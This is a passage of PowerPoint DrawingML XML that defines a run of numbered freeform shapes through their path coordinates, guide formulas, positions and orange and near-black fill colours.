                    <a:gd name="T6" fmla="*/ 3104 w 3104"/>
                    <a:gd name="T7" fmla="*/ 1602 h 2433"/>
                    <a:gd name="T8" fmla="*/ 0 w 3104"/>
                    <a:gd name="T9" fmla="*/ 2433 h 2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04" h="2433">
                      <a:moveTo>
                        <a:pt x="0" y="2433"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="831"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3104" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3104" y="1602"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2433"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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Freeform 663"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3326" y="1825"/>
                  <a:ext cx="29" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 204 w 204"/>
                    <a:gd name="T1" fmla="*/ 0 h 562"/>
                    <a:gd name="T2" fmla="*/ 204 w 204"/>
                    <a:gd name="T3" fmla="*/ 508 h 562"/>
                    <a:gd name="T4" fmla="*/ 0 w 204"/>
                    <a:gd name="T5" fmla="*/ 562 h 562"/>
                    <a:gd name="T6" fmla="*/ 0 w 204"/>
                    <a:gd name="T7" fmla="*/ 54 h 562"/>
                    <a:gd name="T8" fmla="*/ 204 w 204"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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4" h="562">
                      <a:moveTo>
                        <a:pt x="204" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="204" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="562"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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4" name="Freeform 664"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3329" y="1830"/>
                  <a:ext cx="21" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 0 h 491"/>
                    <a:gd name="T2" fmla="*/ 140 w 140"/>
                    <a:gd name="T3" fmla="*/ 454 h 491"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 491 h 491"/>
                    <a:gd name="T6" fmla="*/ 0 w 140"/>
                    <a:gd name="T7" fmla="*/ 38 h 491"/>
                    <a:gd name="T8" fmla="*/ 140 w 140"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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0" h="491">
                      <a:moveTo>
                        <a:pt x="140" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="140" y="454"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="491"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="0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665"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3369" y="1813"/>
                  <a:ext cx="31" cy="81"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 206 w 206"/>
                    <a:gd name="T1" fmla="*/ 0 h 562"/>
                    <a:gd name="T2" fmla="*/ 206 w 206"/>
                    <a:gd name="T3" fmla="*/ 508 h 562"/>
                    <a:gd name="T4" fmla="*/ 0 w 206"/>
                    <a:gd name="T5" fmla="*/ 562 h 562"/>
                    <a:gd name="T6" fmla="*/ 0 w 206"/>
                    <a:gd name="T7" fmla="*/ 54 h 562"/>
                    <a:gd name="T8" fmla="*/ 206 w 206"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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6" h="562">
                      <a:moveTo>
                        <a:pt x="206" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="206" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="562"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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666"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3375" y="1818"/>
                  <a:ext cx="20" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 140 w 140"/>
                    <a:gd name="T3" fmla="*/ 451 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 140"/>
                    <a:gd name="T7" fmla="*/ 35 h 489"/>
                    <a:gd name="T8" fmla="*/ 140 w 140"/>
                    <a:gd name="T9" fmla="*/ 0 h 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0" h="489">
                      <a:moveTo>
                        <a:pt x="140" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="140" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="0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667"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3237" y="1849"/>
                  <a:ext cx="28" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 203 w 203"/>
                    <a:gd name="T1" fmla="*/ 0 h 564"/>
                    <a:gd name="T2" fmla="*/ 203 w 203"/>
                    <a:gd name="T3" fmla="*/ 508 h 564"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 564 h 564"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 54 h 564"/>
                    <a:gd name="T8" fmla="*/ 203 w 203"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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3" h="564">
                      <a:moveTo>
                        <a:pt x="203" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="203" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="564"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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668"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3240" y="1854"/>
                  <a:ext cx="21" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 140 w 140"/>
                    <a:gd name="T3" fmla="*/ 452 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 140"/>
                    <a:gd name="T7" fmla="*/ 38 h 489"/>
                    <a:gd name="T8" fmla="*/ 140 w 140"/>
                    <a:gd name="T9" fmla="*/ 0 h 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0" h="489">
                      <a:moveTo>
                        <a:pt x="140" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="140" y="452"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="0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Freeform 669"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3280" y="1836"/>
                  <a:ext cx="31" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 206 w 206"/>
                    <a:gd name="T1" fmla="*/ 0 h 565"/>
                    <a:gd name="T2" fmla="*/ 206 w 206"/>
                    <a:gd name="T3" fmla="*/ 510 h 565"/>
                    <a:gd name="T4" fmla="*/ 0 w 206"/>
                    <a:gd name="T5" fmla="*/ 565 h 565"/>
                    <a:gd name="T6" fmla="*/ 0 w 206"/>
                    <a:gd name="T7" fmla="*/ 57 h 565"/>
                    <a:gd name="T8" fmla="*/ 206 w 206"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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6" h="565">
                      <a:moveTo>
                        <a:pt x="206" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="206" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="565"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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0" name="Freeform 670"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3286" y="1842"/>
                  <a:ext cx="19" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 140 w 140"/>
                    <a:gd name="T3" fmla="*/ 451 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 140"/>
                    <a:gd name="T7" fmla="*/ 38 h 489"/>
                    <a:gd name="T8" fmla="*/ 140 w 140"/>
                    <a:gd name="T9" fmla="*/ 0 h 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0" h="489">
                      <a:moveTo>
                        <a:pt x="140" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="140" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="0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1" name="Freeform 671"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3148" y="1873"/>
                  <a:ext cx="29" cy="81"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 203 w 203"/>
                    <a:gd name="T1" fmla="*/ 0 h 562"/>
                    <a:gd name="T2" fmla="*/ 203 w 203"/>
                    <a:gd name="T3" fmla="*/ 508 h 562"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 562 h 562"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 54 h 562"/>
                    <a:gd name="T8" fmla="*/ 203 w 203"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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3" h="562">
                      <a:moveTo>
                        <a:pt x="203" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="203" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="562"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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2" name="Freeform 672"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3152" y="1877"/>
                  <a:ext cx="20" cy="72"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 141 w 141"/>
                    <a:gd name="T1" fmla="*/ 0 h 492"/>
                    <a:gd name="T2" fmla="*/ 141 w 141"/>
                    <a:gd name="T3" fmla="*/ 454 h 492"/>
                    <a:gd name="T4" fmla="*/ 0 w 141"/>
                    <a:gd name="T5" fmla="*/ 492 h 492"/>
                    <a:gd name="T6" fmla="*/ 0 w 141"/>
                    <a:gd name="T7" fmla="*/ 38 h 492"/>
                    <a:gd name="T8" fmla="*/ 141 w 141"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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1" h="492">
                      <a:moveTo>
                        <a:pt x="141" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="141" y="454"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="492"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="0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673"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3192" y="1860"/>
                  <a:ext cx="30" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 205 w 205"/>
                    <a:gd name="T1" fmla="*/ 0 h 563"/>
                    <a:gd name="T2" fmla="*/ 205 w 205"/>
                    <a:gd name="T3" fmla="*/ 508 h 563"/>
                    <a:gd name="T4" fmla="*/ 0 w 205"/>
                    <a:gd name="T5" fmla="*/ 563 h 563"/>
                    <a:gd name="T6" fmla="*/ 0 w 205"/>
                    <a:gd name="T7" fmla="*/ 55 h 563"/>
                    <a:gd name="T8" fmla="*/ 205 w 205"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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5" h="563">
                      <a:moveTo>
                        <a:pt x="205" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="205" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="563"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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674"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3197" y="1866"/>
                  <a:ext cx="20" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 139 w 139"/>
                    <a:gd name="T3" fmla="*/ 451 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 139"/>
                    <a:gd name="T7" fmla="*/ 36 h 489"/>
                    <a:gd name="T8" fmla="*/ 139 w 139"/>
                    <a:gd name="T9" fmla="*/ 0 h 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9" h="489">
                      <a:moveTo>
                        <a:pt x="139" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="139" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="0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675"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3059" y="1896"/>
                  <a:ext cx="29" cy="83"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 203 w 203"/>
                    <a:gd name="T1" fmla="*/ 0 h 565"/>
                    <a:gd name="T2" fmla="*/ 203 w 203"/>
                    <a:gd name="T3" fmla="*/ 508 h 565"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 565 h 565"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 54 h 565"/>
                    <a:gd name="T8" fmla="*/ 203 w 203"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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3" h="565">
                      <a:moveTo>
                        <a:pt x="203" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="203" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="565"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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6" name="Freeform 676"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3063" y="1901"/>
                  <a:ext cx="21" cy="72"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 141 w 141"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 141 w 141"/>
                    <a:gd name="T3" fmla="*/ 451 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 141"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 141"/>
                    <a:gd name="T7" fmla="*/ 38 h 489"/>
                    <a:gd name="T8" fmla="*/ 141 w 141"/>
                    <a:gd name="T9" fmla="*/ 0 h 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1" h="489">
                      <a:moveTo>
                        <a:pt x="141" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="141" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="0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7" name="Freeform 677"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3103" y="1884"/>
                  <a:ext cx="31" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 205 w 205"/>
                    <a:gd name="T1" fmla="*/ 0 h 565"/>
                    <a:gd name="T2" fmla="*/ 205 w 205"/>
                    <a:gd name="T3" fmla="*/ 511 h 565"/>
                    <a:gd name="T4" fmla="*/ 0 w 205"/>
                    <a:gd name="T5" fmla="*/ 565 h 565"/>
                    <a:gd name="T6" fmla="*/ 0 w 205"/>
                    <a:gd name="T7" fmla="*/ 57 h 565"/>
                    <a:gd name="T8" fmla="*/ 205 w 205"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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5" h="565">
                      <a:moveTo>
                        <a:pt x="205" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="205" y="511"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="565"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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8" name="Freeform 678"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3109" y="1890"/>
                  <a:ext cx="19" cy="70"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 139 w 139"/>
                    <a:gd name="T3" fmla="*/ 451 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 139"/>
                    <a:gd name="T7" fmla="*/ 38 h 489"/>
                    <a:gd name="T8" fmla="*/ 139 w 139"/>
                    <a:gd name="T9" fmla="*/ 0 h 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9" h="489">
                      <a:moveTo>
                        <a:pt x="139" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="139" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="0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9" name="Freeform 679"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3063" y="1962"/>
                  <a:ext cx="21" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 141 w 141"/>
                    <a:gd name="T1" fmla="*/ 38 h 76"/>
                    <a:gd name="T2" fmla="*/ 0 w 141"/>
                    <a:gd name="T3" fmla="*/ 0 h 76"/>
                    <a:gd name="T4" fmla="*/ 0 w 141"/>
                    <a:gd name="T5" fmla="*/ 76 h 76"/>
                    <a:gd name="T6" fmla="*/ 141 w 141"/>
                    <a:gd name="T7" fmla="*/ 38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1" h="76">
                      <a:moveTo>
                        <a:pt x="141" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="38"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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680"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3109" y="1950"/>
                  <a:ext cx="19" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 35 h 73"/>
                    <a:gd name="T2" fmla="*/ 0 w 139"/>
                    <a:gd name="T3" fmla="*/ 0 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 73 h 73"/>
                    <a:gd name="T6" fmla="*/ 139 w 139"/>
                    <a:gd name="T7" fmla="*/ 35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9" h="73">
                      <a:moveTo>
                        <a:pt x="139" y="35"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="3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1B171B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681"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3152" y="1938"/>
                  <a:ext cx="20" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 141 w 141"/>
                    <a:gd name="T1" fmla="*/ 38 h 76"/>
                    <a:gd name="T2" fmla="*/ 0 w 141"/>
                    <a:gd name="T3" fmla="*/ 0 h 76"/>
                    <a:gd name="T4" fmla="*/ 0 w 141"/>
                    <a:gd name="T5" fmla="*/ 76 h 76"/>
                    <a:gd name="T6" fmla="*/ 141 w 141"/>
                    <a:gd name="T7" fmla="*/ 38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1" h="76">
                      <a:moveTo>
                        <a:pt x="141" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141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1B171B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682"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3197" y="1926"/>
                  <a:ext cx="20" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 37 h 75"/>
                    <a:gd name="T2" fmla="*/ 0 w 139"/>
                    <a:gd name="T3" fmla="*/ 0 h 75"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 75 h 75"/>
                    <a:gd name="T6" fmla="*/ 139 w 139"/>
                    <a:gd name="T7" fmla="*/ 37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9" h="75">
                      <a:moveTo>
                        <a:pt x="139" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="37"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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683"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3240" y="1914"/>
                  <a:ext cx="21" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 38 h 75"/>
                    <a:gd name="T2" fmla="*/ 0 w 140"/>
                    <a:gd name="T3" fmla="*/ 0 h 75"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 75 h 75"/>
                    <a:gd name="T6" fmla="*/ 140 w 140"/>
                    <a:gd name="T7" fmla="*/ 38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0" h="75">
                      <a:moveTo>
                        <a:pt x="140" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14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1B171B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4" name="Freeform 684"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3286" y="1902"/>
                  <a:ext cx="19" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 37 h 73"/>
                    <a:gd name="T2" fmla="*/ 0 w 140"/>
                    <a:gd name="T3" fmla="*/ 0 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 73 h 73"/>
                    <a:gd name="T6" fmla="*/ 140 w 140"/>
                    <a:gd name="T7" fmla="*/ 37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0" h="73">
                      <a:moveTo>
                        <a:pt x="140" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="3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1B171B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5" name="Freeform 685"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3329" y="1890"/>
                  <a:ext cx="21" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 38 h 75"/>
                    <a:gd name="T2" fmla="*/ 0 w 140"/>
                    <a:gd name="T3" fmla="*/ 0 h 75"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 75 h 75"/>
                    <a:gd name="T6" fmla="*/ 140 w 140"/>
                    <a:gd name="T7" fmla="*/ 38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0" h="75">
                      <a:moveTo>
                        <a:pt x="140" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14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1B171B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Freeform 686"/>
